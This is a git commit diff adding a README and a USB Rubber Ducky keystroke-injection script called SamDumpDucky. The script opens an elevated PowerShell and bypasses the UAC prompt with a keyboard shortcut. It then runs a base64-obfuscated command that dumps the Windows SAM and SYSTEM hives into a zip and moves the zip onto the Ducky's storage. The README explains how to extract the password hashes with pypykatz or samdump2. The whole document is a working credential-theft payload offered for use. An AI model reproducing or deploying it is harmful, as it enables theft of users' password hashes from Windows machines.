commit
28000dc626
|
@ -0,0 +1,24 @@
|
|||
**Title: SamDumpDucky**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is SamDumpDucky?**
|
||||
#
|
||||
<p>SamDumpDucky dumps the users sam and system hive and compresses them into a zip file and exfiltrate it onto the Ducky.<br>
|
||||
Afterwards you can use a tool like pypykatz to extract the users hashes.</p>
|
||||
|
||||
|
||||
**Instruction:**
|
||||
1. Plug in your RubberDucky and wait a few seconds
|
||||
|
||||
2. Unzip the exfiltrated zip file onto your machine.
|
||||
|
||||
3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
|
||||
> `samdump2 DuckySys DuckySam`
|
||||
or `pypykatz registry DuckySys --sam DuckySam`
|
||||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
|
@ -0,0 +1,29 @@
|
|||
REM Title: SamDumpDucky
|
||||
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
|
||||
REM Author: 0iphor13
|
||||
REM Version: 1.0
|
||||
REM Category: Credentials
|
||||
REM Attackmodes: HID, Storage
|
||||
|
||||
DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
REM Opening Powershell as Administrator
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
DELAY 1000
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
|
||||
|
||||
ALT j
|
||||
DELAY 1000
|
||||
|
||||
STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAARAB1AGMAawB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAARAB1AGMAawB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABQAFcARABcAEQAdQBjAGsAeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABEAHUAYwBrAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEQAdQBjAGsAeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAARAB1AGMAawB5AFMAeQBzADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAARAB1AGMAawB5AFMAYQBtADsAZQB4AGkAdAA=
|
||||
DELAY 500
|
||||
STRINGLN ;Write-Host "Exfiltrating SamDumpDucky.zip..." -ForegroundColor Green;mv SamDumpDucky.zip ((gwmi win32_volume -f 'label=''DUCKY''').Name);$RD = (gwmi win32_volume -f 'label=''DUCKY''').Name;Start-Sleep 3;(New-Object -comObject Shell.Application).Namespace(17).ParseName($RD).InvokeVerb('Eject');Start-Sleep -s 5;Exit
|
Loading…
Reference in New Issue